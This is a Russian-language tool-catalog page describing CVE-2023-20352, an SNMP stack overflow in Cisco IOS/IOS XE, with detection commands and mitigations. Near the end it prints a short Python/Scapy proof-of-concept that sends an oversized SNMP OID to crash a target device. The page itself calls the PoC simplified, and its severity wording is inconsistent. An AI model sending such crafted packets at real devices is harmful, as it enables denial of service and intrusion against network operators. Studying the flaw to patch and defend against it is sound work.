Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 — критическая ошибка переполнения стека в SNMP-движке Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или захватить root-контроль. Уязвимы все версии SNMP — установите исправление сейчас или рискуйте полной компрометацией. | Kitploit
Инструменты/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Репозиторий
10 месяцев назадЕщё не проверено

CVE-2023-20352 — критическая ошибка переполнения стека в SNMP-движке Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или захватить root-контроль. Уязвимы все версии SNMP — установите исправление сейчас или рискуйте полной компрометацией.

Поделиться

SNMPocalypse: ошибка Cisco позволяет хакерам выводить устройства из строя или получать над ними контроль

CVE-2023-20352 — это критическая уязвимость переполнения стека в движке SNMP Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или получить root-контроль. Уязвимы все версии SNMP — патчите сейчас или рискуйте полной компрометацией.

Автор: Mark Malllia

Введение в SNMP

Простой протокол управления сетью (SNMP) — это базовый протокол в администрировании сетей, позволяющий системным администраторам отслеживать, настраивать и управлять сетевыми устройствами. Он работает на портах 161 (для SNMP-запросов) и 162 (для ловушек). SNMP поддерживает три версии: v1, v2c и v3, каждая из которых обеспечивает разный уровень безопасности. Эта тема мне особенно близка: моя диссертация была посвящена SNMP, а Cisco остаётся неотъемлемой частью моей повседневной работы.

Возможности SNMP распространяются на мониторинг в реальном времени, управление инвентаризацией и обнаружение неисправностей в сетях. Несмотря на свою важность, роль SNMP в управлении сетями также создаёт риски безопасности при недостаточной защите, как видно на примере уязвимости CVE-2023-20352.

Что пошло не так: объяснение CVE-2023-20352

CVE-2023-20352 — это уязвимость высокого уровня серьёзности, связанная с переполнением буфера в стеке, которая затрагивает устройства Cisco IOS и IOS XE. Она находится в подсистеме SNMP, обрабатывающей сетевой управляющий трафик.

Технические детали:

  • Тип уязвимости: переполнение буфера в стеке (CWE-121)
  • Оценка CVSS: 7.7 (высокая)
  • Воздействие: возможный отказ в обслуживании (DoS) или удалённое выполнение кода (RCE)

Уязвимость активируется при отправке специально сформированных SNMP-пакетов на уязвимое устройство, что приводит к некорректной проверке границ и переполнению стека. Затронуты все версии SNMP.

Сценарии эксплуатации

  1. Атака с низкими привилегиями:

    • Требуемый доступ: community-строка SNMPv2c с правами только для чтения или учётные данные SNMPv3.
    • Воздействие: перезагрузка устройства (DoS).
  2. Атака с высокими привилегиями:

    • Требуемый доступ: community-строка SNMPv1/v2c с учётными данными уровня привилегий 15.
    • Воздействие: полное удалённое выполнение кода (RCE) с правами root.

Обнаружение и проверка

Для обнаружения уязвимостей администраторы могут использовать следующие команды CLI:

root@kitploit:~
show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp

Как защититься: меры по смягчению рисков

  • Установка обновлений: Cisco выпустила обновления прошивки для затронутых платформ.
  • Ограничение доступа к SNMP: ограничьте доступ доверенными IP-адресами, если вы этого ещё не сделали.
  • Отключение уязвимых OID: используйте команды вида snmp-server view <view-name> <OID> excluded.

Как злоумышленники могут использовать эту уязвимость

Концептуальный PoC с использованием Python и Scapy демонстрирует возможность эксплуатации:

root@kitploit:~
from scapy.all import *

# Replace with target IP and SNMP community string
target_ip = "192.168.1.1"
community = "public"

# Craft malicious packet
payload = b"A" * 1024  # Overflow buffer
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))

send(packet)

Примечание: это упрощённый пример. Реальная эксплуатация требует точного формирования полезной нагрузки и повышения привилегий.

Заключение

Уязвимость CVE-2023-20352 подчёркивает критическую роль SNMP и связанные с ней риски. Организации должны уделять первоочередное внимание обновлению и защите конфигураций SNMP для снижения угроз и обеспечения устойчивости сети к новым атакам.

Скачать инструмент